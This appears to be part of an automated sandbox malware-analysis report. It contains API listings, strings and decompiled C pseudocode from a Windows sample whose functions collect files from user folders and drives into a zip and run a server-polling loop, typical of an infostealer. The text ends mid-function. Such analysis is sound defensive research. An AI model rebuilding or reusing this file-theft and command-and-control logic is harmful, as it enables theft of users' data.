0x0040a1fc
0x0040a209
0x0040a20f
0x0040a211
0x00000000
0x0040a217
0x0040a224
0x0040a22a
0x00000000
0x0040a22a
0x0040a190
0x0040a19c
0x0040a1a2
0x0040a1a4
0x00000000
0x0040a1a6
0x0040a1a7
0x0040a1bb
0x0040a1c1
0x0040a1c2
0x0040a1d5
0x0040a1db
0x0040a1dd
0x00000000
0x0040a1e3
0x0040a1f0
0x0040a1f6
0x00000000
0x0040a1f6
0x0040a1dd
0x0040a1a4
0x00409fd5
0x00409fe8
0x00409fed
0x00409ff0
0x00409ff2
0x00409ff8
0x0040a001
0x0040a01a
0x0040a024
0x0040a038
0x0040a03e
0x0040a03f
0x0040a03f
0x0040a047
0x0040a09b
0x0040a09b
0x0040a0a7
0x0040a160
0x0040a166
0x0040a168
0x00000000
0x0040a16e
0x0040a17b
0x0040a181
0x0040a22b
0x0040a232
0x0040a246
0x0040a261
0x0040a263
0x0040a266
0x00000000
0x0040a268
0x0040a268
0x0040a26d
0x0040a273
0x0040a284
0x0040a28a
0x0040a28c
0x0040a28e
0x00000000
0x0040a294
0x00000000
0x0040a28c
0x0040a273
0x0040a266
0x0040a0ad
0x0040a0bc
0x00000000
0x0040a0c2
0x0040a0cf
0x0040a0d5
0x0040a0da
0x0040a0e1
0x0040a0fc
0x0040a117
0x0040a11c
0x00000000
0x0040a122
0x0040a122
0x0040a127
0x0040a12d
0x0040a146
0x0040a152
0x0040a296
0x0040a296
0x0040a298
0x0040a29c
0x0040a29e
0x0040a29e
0x0040a2a4
0x0040a2ab
0x0040a2b0
0x0040a2b3
0x0040a2b3
0x00000000
0x0040a146
0x0040a12d
0x0040a11c
0x0040a0bc
0x0040a049
0x0040a049
0x0040a049
0x0040a04a
0x0040a04b
0x0040a057
0x0040a059
0x0040a059
0x0040a05f
0x0040a068
0x0040a06a
0x0040a06a
0x0040a086
0x0040a088
0x0040a08b
0x0040a095
0x0040a2b9
0x0040a2bc
0x00000000
0x0040a2be
0x0040a2be
0x0040a2c4
0x00000000
0x0040a2c6
0x0040a2fa
0x0040a2ff
0x00000000
0x0040a2ff
0x0040a2c4
0x00000000
0x00000000
0x00000000
0x0040a095
0x0040a047
0x00409f2e
0x00409f2e
0x00409f37
0x00409f39
0x00409f40
0x00409f45
0x00409f4a
0x00409f4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00409f4f
0x00409f2c
0x00409ee9
0x00409ed0
0x00000000
0x0040a302
0x0040a30f
0x0040a315
0x0040a323
0x0040a323
0x0040a329
0x0040a337

APIs

wsprintfA.USER32 ref: 00409E48
FindFirstFileA.KERNEL32(?,?), ref: 00409E5F
_memset.LIBCMT ref: 00409E7A
lstrcat.KERNEL32(?,?), ref: 00409E8A
StrCmpCA.SHLWAPI(?,0043F354), ref: 00409EAE
StrCmpCA.SHLWAPI(?,0043F358), ref: 00409EC8

Part of subcall function 00409CAB: GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409CCE
Part of subcall function 00409CAB: GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 00409CDC
Part of subcall function 00409CAB: _malloc.LIBCMT ref: 00409CEE
Part of subcall function 00409CAB: GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 00409D09
Part of subcall function 00409CAB: GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D23
Part of subcall function 00409CAB: OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D2A
Part of subcall function 00409CAB: DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D44
Part of subcall function 00409CAB: MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409D97
Part of subcall function 00409CAB: AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?,?,00000007,00000000), ref: 00409DB8
Part of subcall function 00409CAB: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409DCC

lstrcpy.KERNEL32(?,?), ref: 00409EFC
lstrcat.KERNEL32(?,0043D134), ref: 00409F0F
lstrcat.KERNEL32(?,?), ref: 00409F23
_memset.LIBCMT ref: 00409F5E
_memset.LIBCMT ref: 00409F6F
StrCmpCA.SHLWAPI(?,0043D12C), ref: 00409F82
wsprintfA.USER32 ref: 00409F9F
wsprintfA.USER32 ref: 00409FB6
lstrlenA.KERNEL32(?), ref: 00409FC6
_strtok_s.LIBCMT ref: 00409FE8
PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 0040A00F
CoInitialize.OLE32 ref: 0040A024
_strtok_s.LIBCMT ref: 0040A081
PathMatchSpecA.SHLWAPI(?,?), ref: 0040A0B4
lstrcpy.KERNEL32(?,?), ref: 0040A0CF
lstrcat.KERNEL32(?,0043D134), ref: 0040A0E1

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00409991: __EH_prolog3_GS.LIBCMT ref: 00409998
Part of subcall function 00409991: _strlen.LIBCMT ref: 004099B4
Part of subcall function 00409991: _strlen.LIBCMT ref: 004099D5
Part of subcall function 00409991: _strlen.LIBCMT ref: 004099F3
Part of subcall function 00409991: _strlen.LIBCMT ref: 00409A13
Part of subcall function 00409991: _strlen.LIBCMT ref: 00409A33
Part of subcall function 00409991: _strlen.LIBCMT ref: 00409A53
Part of subcall function 00409991: _strlen.LIBCMT ref: 00409A73

PathFindFileNameA.SHLWAPI(?), ref: 0040A0EE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040A112

Part of subcall function 00409CAB: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409DD5
Part of subcall function 00409CAB: _free.LIBCMT ref: 00409DDC

lstrcat.KERNEL32(?,00000000), ref: 0040A0FC

Part of subcall function 0041803D: CreateFileA.KERNEL32(0040A258,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,0040A258,?), ref: 00418058

FindNextFileA.KERNELBASE(000000FF,?), ref: 0040A30F
FindClose.KERNEL32(000000FF), ref: 0040A323

Strings

%s\*, xrefs: 00409E36
%s\%s, xrefs: 00409FB0
*.lnk, xrefs: 0040A003, 0040A190

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen$File$lstrcat$Find$ClosePath_memsetwsprintf$HandleMatchProcessSecuritySpecToken_strtok_slstrcpy$AccessCheckCreateCurrentDuplicateErrorFirstGenericH_prolog3_InitializeLastMaskNameNextOpenUnothrow_t@std@@@__ehfuncinfo$??2@_free_malloclstrlen
String ID: %s\%s$%s\*$*.lnk
API String ID: 974147253-1856930566
Opcode ID: ba9519919782006a0acbdd8b624403e28cf058bf49b7c4a8515c7d711b1a99e3
Instruction ID: b12d160a60277fd1f921bb71a0b0dacde2233a51c895ad700800cf138aba6f9c
Opcode Fuzzy Hash: ba9519919782006a0acbdd8b624403e28cf058bf49b7c4a8515c7d711b1a99e3
Instruction Fuzzy Hash: 43D13E7590421EABCF219FA1DC48DEE77BDBB09344F0004FAF909E2150DB399A958F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A392 Relevance: 66.8, APIs: 21, Strings: 17, Instructions: 322
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0040A392(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t109;
				void* _t126;
				void* _t128;
				intOrPtr* _t130;
				void* _t138;
				void* _t143;
				void* _t148;
				void* _t153;
				void* _t155;
				signed int _t162;
				intOrPtr _t172;
				int _t179;
				void* _t184;
				void* _t222;
				signed int _t224;
				void* _t230;
				CHAR* _t233;
				signed int _t240;
				intOrPtr* _t241;
				void* _t242;
				void* _t243;
				void* _t248;
				void* _t250;

				_t250 = __eflags;
				E00423679(E00434508, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t242 - 0xca0)) =  *((intOrPtr*)(_t242 + 0xc));
				 *((intOrPtr*)(_t242 - 0xc90)) =  *((intOrPtr*)(_t242 + 0x10));
				 *(_t242 - 0xc98) =  *(_t242 + 0x18);
				 *((intOrPtr*)(_t242 - 0xca4)) =  *((intOrPtr*)(_t242 + 0x1c));
				_t230 = __ecx;
				E0041F6B0(_t242 - 0xc34, 0, 0x3e8);
				E0041F6B0(_t242 - 0x464, 0, 0x3e8);
				E0041F6B0(_t242 - 0x84c, 0, 0x3e8);
				 *0x4474e0(_t242 - 0xc34, "\\Files\\", 0xc98);
				 *0x4474e0(_t242 - 0xc34, _t230);
				 *0x4474e0(_t242 - 0xc34, ".zip");
				_t109 = E0041EA22(0, 0xf4240, 0x3e8, _t250); // executed
				 *((intOrPtr*)(_t242 - 0xc94)) = _t109;
				 *((intOrPtr*)(_t242 - 0xc8c)) = 0;
				 *((intOrPtr*)(_t242 - 0xc9c)) = 0;
				 *0x44758c(_t242 - 0x464, E00417B0B( *((intOrPtr*)(_t242 - 0xca0)), "%APPDATA%", E004181BE(0, 0xf4240, 0x3e8, 0x1a)));
				 *0x44758c(_t242 - 0x464, E00417B0B(_t242 - 0x464, "%LOCALAPPDATA%", E004181BE(0, 0xf4240, 0x3e8, 0x1c)));
				 *0x44758c(_t242 - 0x464, E00417B0B(_t242 - 0x464, "%USERPROFILE%", E004181BE(0, 0xf4240, 0x3e8, 0x28)));
				_t126 = E004049CF(_t242 - 0xc88, E0041717C());
				 *(_t242 - 4) = 0;
				_t128 = E00404DB2(_t242 - 0xc88, _t242 - 0xc50, "C:\\Users\\", _t126);
				 *(_t242 - 4) = 1;
				_t130 = E0040CEB4(_t242 - 0xc88, _t242 - 0xc6c, _t128, "\\Desktop\\");
				_t248 = _t243 + 0x3c;
				 *(_t242 - 4) = 2;
				if( *((intOrPtr*)(_t130 + 0x14)) >= 0x10) {
					_t130 =  *_t130;
				}
				 *0x44758c(_t242 - 0x464, E00417B0B(_t242 - 0x464, "%DESKTOP%", _t130));
				E00404A66(_t242 - 0xc6c, 1, 0);
				E00404A66(_t242 - 0xc50, 1, 0);
				 *(_t242 - 4) =  *(_t242 - 4) | 0xffffffff;
				E00404A66(_t242 - 0xc88, 1, 0);
				_t138 = E004181BE(0, 0xf4240, 1, 5); // executed
				 *0x44758c(_t242 - 0x464, E00417B0B(_t242 - 0x464, "%DOCUMENTS%", _t138));
				_t143 = E004181BE(0, 0xf4240, 1, 0x26); // executed
				 *0x44758c(_t242 - 0x464, E00417B0B(_t242 - 0x464, "%PROGRAMFILES%", _t143));
				_t148 = E004181BE(0, 0xf4240, 1, 0x2a); // executed
				 *0x44758c(_t242 - 0x464, E00417B0B(_t242 - 0x464, "%PROGRAMFILES_86%", _t148));
				_t153 = E004181BE(0, 0xf4240, 1, 8); // executed
				_t155 = E00417B0B(_t242 - 0x464, "%RECENT%", _t153);
				_pop(_t222);
				 *0x44758c(_t242 - 0x464, _t155);
				_push(0);
				_push("*%DRIVE_FIXED%*");
				_push(_t242 - 0x464);
				if( *0x447450() != 0) {
					 *((intOrPtr*)(_t242 - 0xc8c)) = 1;
				}
				_push(0);
				_push("*%DRIVE_REMOVABLE%*");
				_push(_t242 - 0x464);
				if( *0x447450() != 0) {
					 *((intOrPtr*)(_t242 - 0xc8c)) = 1;
					 *((intOrPtr*)(_t242 - 0xc9c)) = 1;
				}
				_t162 =  *0x447450( *((intOrPtr*)(_t242 - 0xca0)), "*%RECENT%*", 0);
				asm("sbb esi, esi");
				_t240 =  ~( ~_t162);
				if( *((intOrPtr*)(_t242 - 0xc8c)) == 0) {
					E0040A338(0, _t222, 0xf4240, __eflags,  *((intOrPtr*)(_t242 - 0xc90)), _t242 - 0x464,  *((intOrPtr*)(_t242 - 0xc94)),  *((intOrPtr*)(_t242 + 0x14)),  *((intOrPtr*)(_t242 + 8)),  *(_t242 - 0xc98), 0, _t240,  *((intOrPtr*)(_t242 + 0x20))); // executed
					_t248 = _t248 + 0x24;
				} else {
					GetLogicalDriveStringsA(0x64, _t242 - 0x7c);
					_t233 = _t242 - 0x7c;
					if( *(_t242 - 0x7c) != 0) {
						do {
							_t179 = GetDriveTypeA(_t233);
							if( *((intOrPtr*)(_t242 - 0xc9c)) == 0) {
								L11:
								 *0x44758c(_t242 - 0x84c, _t242 - 0x464);
								_push(_t233);
								_push("%DRIVE_FIXED%");
							} else {
								_t257 = _t179 - 2;
								if(_t179 != 2) {
									goto L11;
								} else {
									 *0x44758c(_t242 - 0x84c, _t242 - 0x464);
									_push(_t233);
									_push("%DRIVE_REMOVABLE%");
								}
							}
							_t184 = E00417B0B(_t242 - 0x84c);
							_pop(_t222);
							 *0x44758c(_t242 - 0x84c, _t184);
							E0040A338(0, _t222, _t233, _t257,  *((intOrPtr*)(_t242 - 0xc90)), _t242 - 0x84c,  *((intOrPtr*)(_t242 - 0xc94)),  *((intOrPtr*)(_t242 + 0x14)),  *((intOrPtr*)(_t242 + 8)),  *(_t242 - 0xc98),  *((intOrPtr*)(_t242 - 0xc8c)), _t240,  *((intOrPtr*)(_t242 + 0x20)));
							_t248 = _t248 + 0x24;
							_t233 =  &(_t233[lstrlenA(_t233) + 1]);
						} while ( *_t233 != 0);
					}
				}
				_t241 =  *((intOrPtr*)(_t242 - 0xc94));
				_t232 = _t242 - 0xc98;
				E0041EB14(_t241, _t222, _t242 - 0xc98, _t242 - 0xc90);
				_t224 =  *(_t242 - 0xc98);
				E0041EAE0( *((intOrPtr*)(_t242 - 0xca4)), _t242 - 0xc34,  *((intOrPtr*)(_t242 - 0xc90)), 3);
				if(_t241 == 0) {
					 *0x4477d4 = 0x10000;
				} else {
					_t172 =  *_t241;
					if((_t224 & 0xffffff00 | _t172 == 0x00000001) == 0) {
						__eflags = _t172 - 2;
						if(_t172 == 2) {
							_t241 =  *((intOrPtr*)(_t241 + 4));
							 *0x4477d4 = E0041DD7D(_t241);
							__eflags = _t241;
							if(_t241 != 0) {
								E0041EAA2(_t241);
							}
							_push( *((intOrPtr*)(_t242 - 0xc94)));
							E0042040B();
							goto L24;
						} else {
							 *0x4477d4 = 0x80000;
						}
					} else {
						E004089E8(_t241);
						L24:
					}
				}
				return E004236C3(0, _t232, _t241);
			}

0x0040a392
0x0040a39c
0x0040a3a4
0x0040a3ad
0x0040a3b6
0x0040a3c5
0x0040a3d5
0x0040a3d7
0x0040a3e8
0x0040a3f9
0x0040a40d
0x0040a41b
0x0040a42d
0x0040a438
0x0040a43f
0x0040a445
0x0040a44b
0x0040a472
0x0040a49b
0x0040a4c4
0x0040a4d6
0x0040a4e8
0x0040a4eb
0x0040a500
0x0040a504
0x0040a509
0x0040a50c
0x0040a514
0x0040a516
0x0040a516
0x0040a533
0x0040a544
0x0040a551
0x0040a556
0x0040a562
0x0040a569
0x0040a58a
0x0040a592
0x0040a5b3
0x0040a5bb
0x0040a5dc
0x0040a5e4
0x0040a5f6
0x0040a5fc
0x0040a605
0x0040a60b
0x0040a60c
0x0040a617
0x0040a620
0x0040a622
0x0040a622
0x0040a628
0x0040a629
0x0040a634
0x0040a63d
0x0040a63f
0x0040a645
0x0040a645
0x0040a657
0x0040a661
0x0040a663
0x0040a66b
0x0040a758
0x0040a75d
0x0040a671
0x0040a677
0x0040a67d
0x0040a683
0x0040a689
0x0040a68a
0x0040a696
0x0040a6b9
0x0040a6c7
0x0040a6cd
0x0040a6ce
0x0040a698
0x0040a698
0x0040a69b
0x00000000
0x0040a69d
0x0040a6ab
0x0040a6b1
0x0040a6b2
0x0040a6b2
0x0040a69b
0x0040a6d9
0x0040a6df
0x0040a6e8
0x0040a717
0x0040a71c
0x0040a726
0x0040a72a
0x0040a732
0x0040a683
0x0040a760
0x0040a76d
0x0040a775
0x0040a77b
0x0040a796
0x0040a7a0
0x0040a7b6
0x0040a7a2
0x0040a7a2
0x0040a7ac
0x0040a7c2
0x0040a7c5
0x0040a7d3
0x0040a7db
0x0040a7e0
0x0040a7e2
0x0040a7e4
0x0040a7e4
0x0040a7e9
0x0040a7ef
0x00000000
0x0040a7c7
0x0040a7c7
0x0040a7c7
0x0040a7ae
0x0040a7af
0x0040a7f4
0x0040a7f4
0x0040a7ac
0x0040a7fa

APIs

__EH_prolog3_GS.LIBCMT ref: 0040A39C
_memset.LIBCMT ref: 0040A3D7
_memset.LIBCMT ref: 0040A3E8
_memset.LIBCMT ref: 0040A3F9
lstrcat.KERNEL32(?,\Files\), ref: 0040A40D
lstrcat.KERNEL32(?), ref: 0040A41B
lstrcat.KERNEL32(?,.zip), ref: 0040A42D

Part of subcall function 0041EA22: __EH_prolog3.LIBCMT ref: 0041EA29

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

Part of subcall function 00417B0B: StrStrA.SHLWAPI(?,00000000,000003E8,00000000,?,0040A468,%APPDATA%,00000000,?,?,?,?,?,?,?,?), ref: 00417B16
Part of subcall function 00417B0B: lstrcpyn.KERNEL32(C:\Users\user\Documents\,?,00000000,000F4240,?,0040A468,%APPDATA%,00000000,?,?,?,?,?,?,?,?), ref: 00417B2F
Part of subcall function 00417B0B: _strlen.LIBCMT ref: 00417B41
Part of subcall function 00417B0B: wsprintfA.USER32 ref: 00417B52

lstrcpy.KERNEL32(?,00000000), ref: 0040A472
lstrcpy.KERNEL32(?,00000000), ref: 0040A49B
lstrcpy.KERNEL32(?,00000000), ref: 0040A4C4

Part of subcall function 0041717C: GetUserNameA.ADVAPI32(?,?), ref: 004171A7

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00404DB2: _strlen.LIBCMT ref: 00404DBF

Part of subcall function 0040CEB4: _strlen.LIBCMT ref: 0040CEC1

lstrcpy.KERNEL32(?,00000000), ref: 0040A533
lstrcpy.KERNEL32(?,00000000), ref: 0040A58A
lstrcpy.KERNEL32(?,00000000), ref: 0040A5B3
lstrcpy.KERNEL32(?,00000000), ref: 0040A5DC
lstrcpy.KERNEL32(?,00000000), ref: 0040A605
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0040A677
GetDriveTypeA.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040A68A
lstrcpy.KERNEL32(?,?), ref: 0040A6AB
lstrcpy.KERNEL32(?,?), ref: 0040A6C7
lstrcpy.KERNEL32(?,00000000), ref: 0040A6E8
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040A720

Strings

.zip, xrefs: 0040A421
C:\Users\, xrefs: 0040A4E2
%RECENT%, xrefs: 0040A5EB
%USERPROFILE%, xrefs: 0040A4AA
%PROGRAMFILES%, xrefs: 0040A599
%APPDATA%, xrefs: 0040A45E
%DRIVE_FIXED%, xrefs: 0040A6CE
%PROGRAMFILES_86%, xrefs: 0040A5C2
\Desktop\, xrefs: 0040A4F3
%DESKTOP%, xrefs: 0040A519
%LOCALAPPDATA%, xrefs: 0040A481
*%DRIVE_REMOVABLE%*, xrefs: 0040A629
*%RECENT%*, xrefs: 0040A64C
%DOCUMENTS%, xrefs: 0040A570
\Files\, xrefs: 0040A401
*%DRIVE_FIXED%*, xrefs: 0040A60C
%DRIVE_REMOVABLE%, xrefs: 0040A6B2

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$_memset_strlen$lstrcat$Drive$FolderH_prolog3H_prolog3_LogicalNamePathStringsTypeUserlstrcpynlstrlenwsprintf
String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip$C:\Users\$\Desktop\$\Files\
API String ID: 3759205438-1865006654
Opcode ID: d072ec72e6290e5e1cba5f3ed61b1cd8c1103fec02286b4dfdd21261aff06c17
Instruction ID: 882e119fbe2148ba9bdf4f9aff41e7ddb6e9352b082dccca7571b09042dc8a34
Opcode Fuzzy Hash: d072ec72e6290e5e1cba5f3ed61b1cd8c1103fec02286b4dfdd21261aff06c17
Instruction Fuzzy Hash: A7C161B2904218AFEB21EB60DC4AEDA777CEB05304F1041ABF509A7151EF395E898F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C670 Relevance: 63.4, APIs: 34, Strings: 2, Instructions: 434
stringsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E0040C670(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _t111;
				intOrPtr* _t115;
				intOrPtr* _t119;
				void* _t124;
				intOrPtr* _t133;
				void* _t142;
				intOrPtr* _t147;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				signed int _t151;
				intOrPtr* _t154;
				void* _t159;
				void* _t165;
				intOrPtr _t166;
				void* _t167;
				signed int _t172;
				char* _t184;
				char* _t186;
				void* _t199;
				intOrPtr _t204;
				void* _t205;
				intOrPtr _t206;
				void* _t207;
				void* _t213;
				intOrPtr _t231;
				char _t232;
				char _t233;
				char _t234;
				char _t235;
				char _t236;
				signed int _t237;
				void* _t243;
				char* _t249;
				char* _t250;
				long _t253;
				_Unknown_base(*)()* _t255;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t263;
				int _t264;
				BYTE* _t265;
				char* _t266;
				char* _t267;
				char* _t268;
				int _t271;
				BYTE* _t272;
				int _t273;
				BYTE* _t274;
				int _t275;
				BYTE* _t276;
				int _t277;
				BYTE* _t278;
				void* _t279;
				void* _t294;

				_t294 = __fp0;
				_t279 = __eflags;
				_t244 = __edi;
				_t243 = __edx;
				_push(0x954);
				E00423679(E004346B0, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t260 - 0x914)) = 0xf;
				 *((intOrPtr*)(_t260 - 0x918)) = 0;
				 *((char*)(_t260 - 0x928)) = 0;
				 *((intOrPtr*)(_t260 - 4)) = 0;
				E00401286();
				E0041A73C();
				 *0x4472a8 = 0x9c40;
				 *0x4472b4 = 0;
				 *0x4472a0 = 0;
				E0041F6B0(_t260 - 0x500, 0, 0x3e8);
				_t262 = _t261 + 0xc;
				_t111 = E00416A49(0, _t260 - 0x904, __edi, __esi, _t279); // executed
				 *((char*)(_t260 - 4)) = 1;
				if( *((intOrPtr*)(_t111 + 0x14)) >= 0x10) {
					_t111 =  *_t111;
				}
				 *0x4474e0(_t260 - 0x500, _t111);
				 *((char*)(_t260 - 4)) = 0;
				E00404A66(_t260 - 0x904, 1, 0);
				_t252 = _t260 - 0x904;
				_t115 = E004171BF(0, _t243, _t244, _t260 - 0x904); // executed
				 *((char*)(_t260 - 4)) = 2;
				_t281 =  *((intOrPtr*)(_t115 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t115 + 0x14)) >= 0x10) {
					_t115 =  *_t115;
				}
				 *0x4474e0(_t260 - 0x500, _t115);
				 *((char*)(_t260 - 4)) = 0;
				E00404A66(_t260 - 0x904, 1, 0);
				_t245 = _t260 - 0x904;
				_t119 = E00416CDA(0, _t243, _t260 - 0x904, _t252, _t281); // executed
				 *((char*)(_t260 - 4)) = 3;
				if( *((intOrPtr*)(_t119 + 0x14)) >= 0x10) {
					_t119 =  *_t119;
				}
				 *0x4474e0(_t260 - 0x500, _t119);
				_t227 = _t260 - 0x904;
				 *((char*)(_t260 - 4)) = 0;
				E00404A66(_t260 - 0x904, 1, 0);
				_t253 = 0x1f0003;
				while(1) {
					_t124 = OpenEventA(_t253, 0, _t260 - 0x500);
					 *0x4472b0 = _t124;
					if(_t124 == 0) {
						break;
					}
					CloseHandle(_t124);
					Sleep(0x1388);
				}
				 *0x4472b0 = CreateEventA(0, 0, 0, _t260 - 0x500);
				E0041F6B0(_t260 - 0x118, 0, 0x104);
				_t263 = _t262 + 0xc;
				 *0x4474e0(_t260 - 0x118, "/");
				_t133 = E00408A63(_t227, _t260 - 0x904);
				 *((char*)(_t260 - 4)) = 4;
				_t284 =  *((intOrPtr*)(_t133 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t133 + 0x14)) >= 0x10) {
					_t133 =  *_t133;
				}
				 *0x4474e0(_t260 - 0x118, _t133);
				_t228 = _t260 - 0x904;
				 *((char*)(_t260 - 4)) = 0;
				E00404A66(_t260 - 0x904, 1, 0);
				while(1) {
					_push("|");
					_t264 = _t263 - 0x1c;
					 *(_t260 - 0x930) = _t264;
					E00408A9B(_t228, _t264);
					_t265 = _t264 - 0x1c;
					 *((char*)(_t260 - 4)) = 6;
					 *(_t260 - 0x92c) = _t265;
					E00408AEF(_t228, _t265);
					 *((char*)(_t260 - 4)) = 7;
					_t142 = E00408AEF(_t228, _t260 - 0x904);
					 *((char*)(_t260 - 4)) = 8;
					_push( *((intOrPtr*)(_t142 + 0x10)) + 1);
					 *((char*)(_t260 - 4)) = 9;
					E0040B5B1(0, _t228, _t243, _t245, _t253, _t284); // executed
					_t266 =  &(_t265[0x40]);
					_t229 = _t260 - 0x904;
					 *((char*)(_t260 - 4)) = 0;
					E00404A66(_t260 - 0x904, 1, 0);
					_t147 =  *0x4452cc; // 0x5b1588
					_t245 = 0x4452cc;
					if( *0x4452e0 < 0x10) {
						_t147 = 0x4452cc;
					}
					_t253 = "ERROR";
					_t148 =  *0x447510(_t147, _t253);
					_t286 = _t148;
					if(_t148 != 0) {
						_t277 = _t266 - 0x1c;
						_t229 = _t277;
						 *(_t260 - 0x930) = _t277;
						E004049CF(_t277, _t260 - 0x118);
						_t278 = _t277 - 0x1c;
						 *((char*)(_t260 - 4)) = 0xa;
						 *(_t260 - 0x92c) = _t278;
						E00404E93(_t278, _t245);
						 *((char*)(_t260 - 4)) = 0;
						E0040B6E9(0, _t245, _t278, _t286); // executed
						_t266 =  &(_t278[0x38]);
						_t253 = "ERROR";
					}
					_t149 =  *0x4452cc; // 0x5b1588
					if( *0x4452e0 < 0x10) {
						_t149 = _t245;
					}
					_t150 =  *0x447510(_t149, _t253);
					_t288 = _t150;
					if(_t150 != 0) {
						break;
					}
					_push("|");
					_t271 = _t266 - 0x1c;
					 *(_t260 - 0x930) = _t271;
					E00408AB7(_t229, _t271);
					_t272 = _t271 - 0x1c;
					 *((char*)(_t260 - 4)) = 0xc;
					 *(_t260 - 0x92c) = _t272;
					E00408AEF(_t229, _t272);
					 *((char*)(_t260 - 4)) = 0xd;
					_t199 = E00408AEF(_t229, _t260 - 0x904);
					 *((char*)(_t260 - 4)) = 0xe;
					_push( *((intOrPtr*)(_t199 + 0x10)) + 1);
					 *((char*)(_t260 - 4)) = 0xf;
					E0040B5B1(0, _t229, _t243, _t245, _t253, _t288);
					_t266 =  &(_t272[0x40]);
					 *((char*)(_t260 - 4)) = 0;
					E00404A66(_t260 - 0x904, 1, 0);
					_t204 =  *0x4452cc; // 0x5b1588
					if( *0x4452e0 < 0x10) {
						_t204 = _t245;
					}
					_t205 =  *0x447510(_t204, _t253);
					_t290 = _t205;
					if(_t205 != 0) {
						_t275 = _t266 - 0x1c;
						 *(_t260 - 0x930) = _t275;
						E004049CF(_t275, _t260 - 0x118);
						_t276 = _t275 - 0x1c;
						 *((char*)(_t260 - 4)) = 0x10;
						 *(_t260 - 0x92c) = _t276;
						E00404E93(_t276, _t245);
						 *((char*)(_t260 - 4)) = 0;
						E0040B6E9(0, _t245, _t276, _t290);
						_t266 =  &(_t276[0x38]);
						_t253 = "ERROR";
					}
					_t206 =  *0x4452cc; // 0x5b1588
					if( *0x4452e0 < 0x10) {
						_t206 = _t245;
					}
					_t207 =  *0x447510(_t206, _t253);
					_t292 = _t207;
					if(_t207 != 0) {
						break;
					} else {
						_t273 = _t266 - 0x1c;
						_t228 = _t273;
						 *(_t260 - 0x930) = _t273;
						E004049CF(_t273, _t260 - 0x118);
						_t274 = _t273 - 0x1c;
						 *((char*)(_t260 - 4)) = 0x11;
						 *(_t260 - 0x92c) = _t274;
						E00408AD3(_t273, _t274);
						 *((char*)(_t260 - 4)) = 0;
						E0040B6E9(0, _t245, _t253, _t292);
						_t266 =  &(_t274[0x38]);
						if( *0x4452e0 >= 0x10) {
							_t245 =  *0x4452cc; // 0x5b1588
						}
						_t213 =  *0x447510(_t245, _t253);
						_t284 = _t213;
						if(_t213 != 0) {
							break;
						} else {
							Sleep(0x1d4c0);
							continue;
						}
					}
				}
				_t151 = E0041EA22(0, 0x5f5e100, _t253, __eflags); // executed
				 *0x4472ac = _t151;
				E0041F6B0(_t260 - 0x8e8, 0, 0x3e8);
				_t154 =  *0x4452cc; // 0x5b1588
				_t267 =  &(_t266[0xc]);
				__eflags =  *0x4452e0 - 0x10;
				if(__eflags < 0) {
					_t154 = 0x4452cc;
				}
				 *0x4474e0(_t260 - 0x8e8, _t154);
				 *0x4474e0(_t260 - 0x8e8, "/");
				_t159 = 0xc;
				 *0x4474e0(_t260 - 0x8e8, E00417BB8(_t159, __eflags));
